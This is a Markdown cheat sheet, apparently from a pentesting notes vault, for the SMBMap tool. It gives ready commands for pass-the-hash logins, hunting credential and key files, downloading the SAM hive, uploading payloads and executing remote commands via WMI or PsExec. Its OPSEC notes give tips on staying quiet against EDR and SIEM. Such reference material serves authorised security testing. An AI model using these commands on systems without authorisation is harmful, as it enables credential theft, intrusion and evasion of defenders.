smbmap.md (12035B)
1 --- 2 title: "SMBMap" 3 description: "SMBMap share enumeration, permissions mapping, file download/upload and command execution over SMB." 4 category: enumeration 5 tags: [enumeration, smb, shares] 6 tools: [SMBMap] 7 difficulty: beginner 8 updated: "2026-08-09" 9 source: "vault:Enumeration/SMBMAP.md" 10 --- 11 12 # SMBMap 13 14 SMBMap enumerates SMB shares and permissions (READ/WRITE/NO ACCESS), lists and downloads files, and can execute commands across single hosts or a network range. Requires Python 3 (`pip3 install smbmap` or the Kali package). Version referenced: v1.10.7. 15 16 ## Share Enumeration (authenticated & null session) 17 18 Enumerate shares, permissions, and host metadata. Needs port 445 reachable. 19 20 ```bash 21 # Null session (anonymous) 22 smbmap -H 192.168.1.10 23 24 # Authenticated with password 25 smbmap -u jsmith -p 'Password1!' -d CORP -H 192.168.1.10 26 27 # Pass-the-Hash (NTLM) 28 smbmap -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' -H 192.168.1.10 29 30 # Host-file sweep (IPs, FQDNs, or CIDR accepted) 31 smbmap --host-file targets.txt -u jsmith -p 'Password1!' -d CORP 32 33 # Check admin access only 34 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 --admin 35 36 # Check SMB signing status 37 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 --signing 38 39 # Return OS version 40 smbmap -u jsmith -p 'Password1!' -H 192.168.1.10 -v 41 ``` 42 43 **Auth & enumeration flags:** 44 45 | Flag | Description | Default | 46 |---|---|---| 47 | `-H HOST` | Target IP or FQDN | — | 48 | `--host-file FILE` | File of hosts (IP/FQDN/CIDR) | — | 49 | `-u USERNAME` | Username; omit for null session | null | 50 | `-p PASSWORD` | Plaintext or `LMHASH:NTHASH` | — | 51 | `--prompt` | Prompt for password (avoids shell history) | off | 52 | `-d DOMAIN` | Domain name | WORKGROUP | 53 | `-P PORT` | SMB port | 445 | 54 | `-v` | Return remote OS version | off | 55 | `--admin` | Report if user is admin only | off | 56 | `--signing` | Check SMB signing state | off | 57 | `--no-write-check` | Skip write permission check (quieter) | off | 58 | `--timeout SEC` | Socket connect timeout | 0.5s | 59 | `--no-banner` | Suppress banner | off | 60 | `--no-color` | Suppress colour output | off | 61 62 ```bash 63 # PtH against an entire /24 64 smbmap --host-file hosts.txt -u admin -p 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c' -d CORP 65 66 # Suppress write check for stealth (fewer WRITE probes) 67 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --no-write-check -q 68 69 # Output to CSV for reporting 70 smbmap -u jsmith -p 'Password1!' --host-file targets.txt --csv results.csv 71 ``` 72 73 **Output interpretation:** 74 - `ADMIN!!!` next to host → current user has admin privileges. 75 - `READ, WRITE` → full access; high value for lateral movement or payload staging. 76 - `NO ACCESS` → share visible but inaccessible. 77 - `READ ONLY` → can list/download, cannot write. 78 79 **OPSEC:** every connection creates Windows Event ID **4624** (logon) and **4648** (explicit creds); **4776** for NTLM auth. The write check attempts a dummy directory create (visible in the Security log). Default WMI execution mode (`-x`) spawns WMI activity → **4688**/Sysmon **1**. Host-file sweeps produce rapid multi-host auth attempts that will trip lockout policies and brute-force detections if creds are wrong. 80 81 ## Directory & File Listing 82 83 Recursively enumerate share contents. Needs READ access; deeper traversal of admin shares (`C$`, `ADMIN$`) may require elevated creds. 84 85 ```bash 86 # List root of ALL shares 87 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 88 89 # Recurse into a specific path 90 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Finance/Payroll' 91 92 # Set depth of traversal (default: 1) 93 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --depth 5 94 95 # List directories only (no files) 96 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --dir-only 97 98 # List all local drives (requires admin) 99 smbmap -u administrator -p 'Password1!' -H 10.10.10.10 -L 100 101 # Exclude noisy default shares 102 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r --exclude ADMIN$ IPC$ print$ 103 ``` 104 105 | Flag | Description | Default | 106 |---|---|---| 107 | `-r [PATH]` | Recursive list; no path = all share roots | all shares | 108 | `--depth N` | Max traversal depth | 1 | 109 | `--dir-only` | Omit files, show directories only | off | 110 | `--exclude SHARE…` | Skip named shares | none | 111 | `-L` | List local drives (admin required) | off | 112 | `-g FILE` | Grep-friendly output file (used with `-r`) | none | 113 | `--csv FILE` | CSV output | none | 114 | `-q` | Quiet: show only READ/WRITE shares | off | 115 116 ```bash 117 # Full recursive enum of a share, output to grep file 118 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Users' --depth 4 -g users_out.txt 119 120 # Quiet CSV output across subnet 121 smbmap -u jsmith -p 'Password1!' --host-file targets.txt -r --csv shares.csv -q 122 ``` 123 124 Look for `.config`, `.xml`, `.kdbx`, `.ps1`, `.bat`, `id_rsa`, `web.config`, `*.bak`. Deep recursion (`--depth > 3`) generates high SMB read volume (detectable by DLP/EDR); scope to a single share to reduce noise. `STATUS_ACCESS_DENIED` → creds lack access; try admin creds. 125 126 ## File Pattern Matching & Auto-Download 127 128 Search share filenames by regex and auto-download matches. Requires `-r`; patterns are case-insensitive. 129 130 ```bash 131 # Auto-download all config/web files 132 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '(web|global)\.(asax|config)' 133 134 # Find and grab any file with "password"/"cred" in the name 135 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '(password|cred|secret|pass)' --depth 5 136 137 # Match backup or KeePass files 138 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r -A '\.(kdbx|bak|old|zip|7z)$' --depth 6 -q 139 ``` 140 141 | Flag | Description | Default | 142 |---|---|---| 143 | `-A PATTERN` | Regex for filename match; auto-downloads on hit (requires `-r`) | off | 144 | `-r [PATH]` | Required with `-A` | — | 145 | `--depth N` | How deep to search | 1 | 146 | `-q` | Suppress non-matching output | off | 147 148 ```bash 149 # Hunt for SSH keys and certs 150 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'Users' -A '(id_rsa|\.pem|\.pfx|\.p12|\.ppk)' --depth 6 -q 151 152 # Grab PowerShell and batch scripts 153 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 -r 'NETLOGON' -A '\.(ps1|bat|cmd|vbs)$' --depth 4 154 ``` 155 156 Matched files download to the current directory as `[hostname]_[share]_[filename]`. No downloads despite hits → check write perms on your CWD. Test regex separately: `python3 -c "import re; re.compile('PATTERN')"`. 157 158 ## File Content Search (`-F`) 159 160 Search the *content* of remote files via regex, executed through PowerShell on the victim. Requires admin creds, PowerShell on target, and running smbmap as **root** (experimental feature). 161 162 ```bash 163 # Search for password strings in C:\Users (default path) 164 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F '[Pp]assword' 165 166 # Search a specific drive/path 167 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F '[Pp]assword' --search-path 'D:\HR\' 168 169 # Extend timeout for large drives (default 300s) 170 sudo smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 -F 'api.key|secret' --search-timeout 600 171 ``` 172 173 | Flag | Description | Default | 174 |---|---|---| 175 | `-F PATTERN` | Regex to search file contents | — | 176 | `--search-path PATH` | Drive/path to search | `C:\Users` | 177 | `--search-timeout SEC` | Kill job after N seconds | 300 | 178 179 > **Warning — `-F` is the noisiest smbmap feature.** It drops and deletes a temp `.txt` under `C:\Temp\` (Sysmon EID 11/23), triggers PowerShell script-block logging (**4104**) and process creation (**4688**), and touches admin shares (**5140/5145**). Avoid in engagements with mature EDR/SIEM. 180 181 ## File Upload / Download / Delete 182 183 Transfer files to/from shares or delete remote files. Needs WRITE for upload/delete, READ for download. 184 185 ```bash 186 # Download a file 187 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --download 'C$\Users\jsmith\Desktop\passwords.txt' 188 189 # Upload a file 190 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --upload '/tmp/payload.exe' 'C$\Temp\payload.exe' 191 192 # Delete a file (prompts confirmation) 193 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'C$\Temp\payload.exe' 194 195 # Delete without confirmation prompt 196 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'C$\Temp\payload.exe' --skip 197 ``` 198 199 | Flag | Description | 200 |---|---| 201 | `--download PATH` | Remote path in `SHARE\path\file` format | 202 | `--upload SRC DST` | Local src path, then remote `SHARE\path\file` | 203 | `--delete PATH` | Remote path to delete | 204 | `--skip` | Skip delete confirmation | 205 206 ```bash 207 # Grab SAM hive backup 208 smbmap -u administrator -p 'P@ssw0rd' -H 10.10.10.10 --download 'C$\Windows\Repair\SAM' 209 210 # Stage a tool to a writable share, then clean up 211 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --upload '/opt/tools/tool.exe' 'Data\tool.exe' 212 smbmap -u jsmith -p 'Password1!' -H 10.10.10.10 --delete 'Data\tool.exe' --skip 213 ``` 214 215 **OPSEC:** writes to admin shares (`C$`) generate **5145** and **4663**; uploading executables to `C$\Temp\` is a high-confidence IOC (AV/EDR scans on write). Prefer writable non-admin shares. `STATUS_ACCESS_DENIED` on upload → share is READ only or path doesn't exist (create the directory first). 216 217 ## Remote Command Execution 218 219 Execute commands via WMI (default) or PsExec over SMB. Requires admin creds; WMI needs port 445 + DCOM ports open. 220 221 ```bash 222 # Execute command via WMI (default) 223 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'whoami' 224 225 # Execute via PsExec 226 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'whoami' --mode psexec 227 228 # Domain group enumeration 229 smbmap -u administrator -p 'P@ssw0rd' -d CORP -H 10.10.10.10 -x 'net group "Domain Admins" /domain' 230 231 # PtH command exec 232 smbmap -u administrator -p 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c' -H 10.10.10.10 -x 'ipconfig /all' 233 ``` 234 235 | Flag | Description | Default | 236 |---|---|---| 237 | `-x COMMAND` | Command string to execute | — | 238 | `--mode CMDMODE` | `wmi` or `psexec` | `wmi` | 239 240 Output is returned inline (no interactive shell); empty output often means the command ran with no stdout. WMI → **4688**/Sysmon **1** + WMI-Activity/Operational log. PsExec → creates a service (**7045**, very high-fidelity). Prefer WMI for a lower footprint. No output returned → WMI may be firewalled (TCP 135 + dynamic RPC); try `--mode psexec`. 241 242 ## Kerberos Authentication 243 244 Authenticate to shares with Kerberos tickets (Pass-the-Ticket / ccache). Needs a valid `.ccache`, `KRB5CCNAME` set, and the DC reachable by FQDN (marked "super beta" by the developer). 245 246 ```bash 247 # Set ccache path and use Kerberos auth (no password) 248 export KRB5CCNAME='/tmp/jsmith.ccache' 249 smbmap -k --no-pass -H dc01.corp.local -d CORP --dc-ip 10.10.10.1 250 251 # Kerberos with username (overpass-the-hash scenarios) 252 export KRB5CCNAME='/tmp/jsmith.ccache' 253 smbmap -k -u jsmith -H fileserver.corp.local -d CORP --dc-ip 10.10.10.1 254 ``` 255 256 | Flag | Description | 257 |---|---| 258 | `-k` / `--kerberos` | Enable Kerberos authentication | 259 | `--no-pass` | Use ccache only (no password prompt) | 260 | `--dc-ip IP/Host` | IP or FQDN of Domain Controller | 261 262 Kerberos avoids sending NTLM hashes over the wire (no NTLM-relay signal) but still generates **4624** (logon type 3) and **4769** (service ticket) on the DC. 263 264 > **Note — Common errors.** `Kerberos SessionError` → clock skew > 5 min, sync with `ntpdate`/`faketime`. Must use the FQDN (`-H dc01.corp.local`), not the IP — SPN resolution fails on a raw IP. If `KRB5CCNAME` is unset the tool may silently fall back to NTLM; always verify the env var. 265 266 ## Version / Platform Notes 267 268 - Requires Python 3; legacy Python 2 support dropped. 269 - `--signing` was added in recent versions; not present in older Kali packages. 270 - `-A` (filename pattern auto-download) requires `-r`; use lowercase `-r` (mixing with the old `-R` flag can error on newer installs). 271 - On Kali, the system package may lag behind PyPI; prefer `pip3 install --upgrade smbmap` for the latest. 272 - `--host-file` accepts IPs, FQDNs, and CIDR notation. 273 274 ## Sources 275 276 - https://github.com/ShawnDEvans/smbmap 277 - https://manpages.debian.org/bookworm/smbmap/smbmap.1.en.html 278 - https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/